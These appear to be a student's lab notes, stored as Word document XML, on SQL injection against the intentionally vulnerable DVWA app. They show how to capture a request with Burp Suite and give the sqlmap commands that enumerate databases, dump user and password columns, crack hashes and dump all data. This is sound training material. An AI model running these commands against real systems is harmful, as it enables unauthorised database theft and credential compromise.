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F0A5" w14:textId="7642730F" w:rsidR="00614806" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00755445">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Sql blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D27920" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCCBFC9" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>=&gt;agenda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E65BB5" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="0A5918DB" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>we’re laying out an agenda to demonstrate an SQL Injection attack using Burp Suite + sqlmap on DVWA web application’s database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B44D4" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>The goal is not magic hacking, but to show how a vulnerable request can lead to full database compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C467F" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="19992292" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>Capture a vulnerable HTTP request → feed it to sqlmap → automatically exploit SQL Injection → extract database data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D009DE" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="2217406C" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>Burp Suite = traffic capture(Burp Suite acts as a Man</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>Middle (MITM) proxy that intercepts HTTP/HTTPS traffic between the browser and the web application, allowing us to view and modify requests and responses.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F409B" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="712E5E2F" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="1AE03639" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>SQL Injection is a web vulnerability where an attacker manipulates user input to execute unauthorized SQL queries on a backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CFA02" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="095FD547" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>sqlmap = SQL injection exploitation(sqlmap is an automated penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>testing tool used to detect and exploit SQL injection vulnerabilities and extract database information.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85C143" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="7253F137" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>DVWA = intentionally vulnerable target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959CEEF" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="2564555B" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>SQL Injection happens through HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B562F" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="3A95FF8C" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>sqlmap needs a real request to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277979B9" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="7A3F7C34" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>sql.txt becomes the input for sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708CDA76" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="66A5DF92" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047EC3E0" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="0E2D2811" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>Burp Suite part — capturing the vulnerable request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566D6C9" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="054AC938" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t xml:space="preserve">1)open burpsuite -&gt; intercept on -&gt;  open browser -&gt; enter the ip address of metaspoilt -&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211627E9" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="6A05E2D2" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>click on dvwa -&gt; forward request -&gt; right click the request -&gt; do it till the command 1 on sql i -&gt; save file as sql.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663364D" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00755445"/>
    <w:p w14:paraId="3467029E" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is inside sql.txt that allows sqlmap to work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC4103" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve">sql.txt contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>complete HTTP request</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> captured by Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6F339" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve">This request gives sqlmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>everything it needs to attack the application</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC816DF" w14:textId="706B3995" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00755445">
      <w:r w:rsidRPr="00825612">
        <w:t>1️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> Target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C35CA2" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t>GET /dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D76B91" w14:textId="21C59C81" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t>Host: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD82FA" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> Tells sqlmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF67BC0" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>Which page to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF640CE" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>Which parameter (id) to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB01BD" w14:textId="1B803AF3" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>2️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> Vulnerable parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F308C63" w14:textId="2D6EE575" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15389CFA" w14:textId="627B9CA2" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>3️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> Session cookies (authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C78351" w14:textId="5FFCFE50" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t xml:space="preserve">Example - </w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t>Cookie: PHPSESSID=abc123; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72585465" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> This is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA8ED8" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>DVWA requires login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736BA87" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve">sqlmap reuses your </w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authenticated session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77382A75" w14:textId="119898E6" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>Otherwise it would be blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC6F9F" w14:textId="55C1B5B7" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>4️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> HTTP method (GET / POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C3A0C" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap needs to know:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCBE7DB" w14:textId="77777777" w:rsidR="00825612" w:rsidRPr="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>How data is sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A7C07" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00825612">
        <w:t>Where to inject payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952D5BB" w14:textId="2A1EFC7C" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t xml:space="preserve">Example - </w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t>POST /dvwa/vulnerabilities/sqli/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C68EA" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612"/>
    <w:p w14:paraId="3C6AAFD2" w14:textId="0AF52998" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>5️</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:t xml:space="preserve"> Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46C430" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BB67E" w14:textId="7EE14963" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r>
        <w:t>Referer: http://192.168.56.101/dvwa/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A7F06" w14:textId="77777777" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612"/>
    <w:p w14:paraId="10514687" w14:textId="7708799F" w:rsidR="00825612" w:rsidRDefault="00825612" w:rsidP="00825612">
      <w:r w:rsidRPr="00825612">
        <w:t>Helps sqlmap behave like a real browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00825612">
        <w:br/>
        <w:t xml:space="preserve"> Avoids basic filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04198B" w14:textId="77777777" w:rsidR="00F240F6" w:rsidRDefault="00F240F6" w:rsidP="00825612"/>
    <w:p w14:paraId="7AA350C5" w14:textId="38FFD380" w:rsidR="00F240F6" w:rsidRPr="00825612" w:rsidRDefault="00F240F6" w:rsidP="00825612">
      <w:r w:rsidRPr="00F240F6">
        <w:t>sql.txt contains a captured HTTP request with URL, parameters, and session cookies that sqlmap uses to automatically test and exploit SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435439B6" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="7FD98991" w14:textId="001B2788" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t xml:space="preserve">2)open the folder where u saved it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC1972" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="577F8F9D" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt; command explanation -&gt; -r sql.txt → use the captured request , --dbs → enumerate all available databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B55153" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="6DFDCE71" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>internally it runs -&gt; show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5B778" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="53BC3828" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt;sqlmap -r sql.txt --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C32DE5" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="38C4A274" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt;press y -&gt; y -&gt; n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A990425" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="0B40EEA3" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt;now u will be able to see the available databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FABF8" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="5545313E" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3)command explanation -&gt; -D dvwa → target the dvwa database ,--tables → list tables inside it-&gt;internally it runs SHOW TABLES FROM dvwa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F03CB" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="55C16EA4" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt;sqlmap -r sql.txt -D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE78FE" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="3E34AC4C" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>4)command explanation -&gt; -T users → target the users table,--columns → list columns in that table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2BB8D" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="1AA1BED5" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>-&gt;sqlmap -r sql.txt -D dvwa -T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22A41B" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="2DFE7886" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>5)command explanation -&gt; -C user,password → select specific columns -&gt; --dump → extract their data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166288EB" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="5D2B69D9" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>“We are extracting the usernames and passwords used to log into the DVWA web application.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658898CD" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="445ACAB0" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>SQL Injection allows unauthorized access to stored credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E9016" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="318A8724" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>Weak hashing makes passwords easy to crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F402E" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="08FDDEDC" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t xml:space="preserve">sqlmap -r sql.txt -D dvwa -T users -C user,password --dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B4F9A" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="60098AD4" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>press n-&gt; y -&gt; press enter -&gt; n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FD695" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="0577FDBB" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>now it will crack the hashes -&gt; user table , password table and cracked passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D9C1D" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="276AF2AE" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>6)man sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECD780" w14:textId="77777777" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445"/>
    <w:p w14:paraId="5FE77A6C" w14:textId="20E44DCD" w:rsidR="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:t>7)command explanation -&gt; Dumps everything -&gt; All databases -&gt; All tables -&gt; All dat</w:t>
      </w:r>
      <w:r w:rsidR="00F34F9B">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A688944" w14:textId="4E507812" w:rsidR="00755445" w:rsidRPr="00755445" w:rsidRDefault="00755445" w:rsidP="00755445">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt;sqlmap -r sql.txt --dump-all</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00755445" w:rsidRPr="00755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E76DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E310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86E29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6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10B16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18EA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408103">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1437023101">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="70093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79"/>
    <w:rsid w:val="0021530C"/>
    <w:rsid w:val="00282863"/>
    <w:rsid w:val="002D7C79"/>
    <w:rsid w:val="00614806"/>
    <w:rsid w:val="00755445"/>
    <w:rsid w:val="008106B6"/>
    <w:rsid w:val="00825612"/>
    <w:rsid w:val="009415C1"/>
    <w:rsid w:val="009E3748"/>
    <w:rsid w:val="00AC1C8A"/>
    <w:rsid w:val="00F240F6"/>
    <w:rsid w:val="00F3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29AB3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01E89052-DC98-4CD7-8A25-FD97419CD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raghuprasad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>vidya raghuprasad</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-26T09:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-26T09:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>